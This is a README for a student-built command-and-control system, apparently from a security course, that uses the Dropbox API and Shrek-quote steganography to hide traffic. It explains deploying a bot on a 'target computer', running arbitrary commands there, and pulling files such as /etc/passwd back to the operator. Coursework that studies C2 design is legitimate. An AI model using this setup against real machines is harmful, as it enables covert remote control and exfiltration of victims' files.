Command and Control system using Dropbox and steganography developed by Petr Zahradník for the course BSY at FEE CTU in Prague. For educational purposes only.
First, obtain a Dropbox access token. Navigate to https://www.dropbox.com/developers,
create a new app, allow files.metadata.write
, files.metadata.read
, files.content.write
,
files.content.read
. Permission type can be Scoped App (App Folder)
. Finally click
Generated access token
and put it into the environment variable (via bash or .env).
TOKEN=sl.example123...
Then install the dropbox
sdk.
pip install -r requirements.txt
Run bot on the target computer:
python bot.py
Run server on your computer:
python server.py
Server is interactive, use can you it to send commands and receive responses.
Type help
to show help.
Most useful commands are:
bots
refreshes the list of connected bots and displays the alive ones. Use the bot indexes in the further commands.> bots Connected bots: 0: arrogant terrible Pigs
run
runs a user defined command on the target computer.> run 0 date
cp
copies a file to your computer. Note that the file is not written until you runresp
.> cp 0 /etc/passwd
resp
refreshes command responses for a specified bot and prints them.> resp 0 Responses from arrogant terrible Pigs: date Sun Jan 7 11:38:13 PM CET 2024 cp /etc/passwd Written to: passwd
The communication happends via Dropbox API using text files only.
The server writes commands into fav_scenes/
folder and receives responses
through wtf_dialogues/
. Furthermore the bots send healthchecks to quotes/
.
The health checks are random lines, but commands and responses are encoded UTF-8 bytes. Each byte is written as a line from Shrek movie using a look-up table. This way arbitrary commands are supported as well as the whole unicode charset.
Files are given randomly generated <adjective> <adjective> <fairytale character>.txt
names,
e.g. amused ugly HumptyDumpty.txt
.
All features are supported except for
The controller should check if the bots are alive periodically.
The healthcheck is sent periodically but the server only check them when you call bots
command.
This is to simplify the architecture and provide predictable bot numbering scheme.
There are numerous extensions possible. For example transfering files to the victim computer would be very easy to implement. The bot code could futhermore be enhanced to support running multiple commands in a non-blocking way.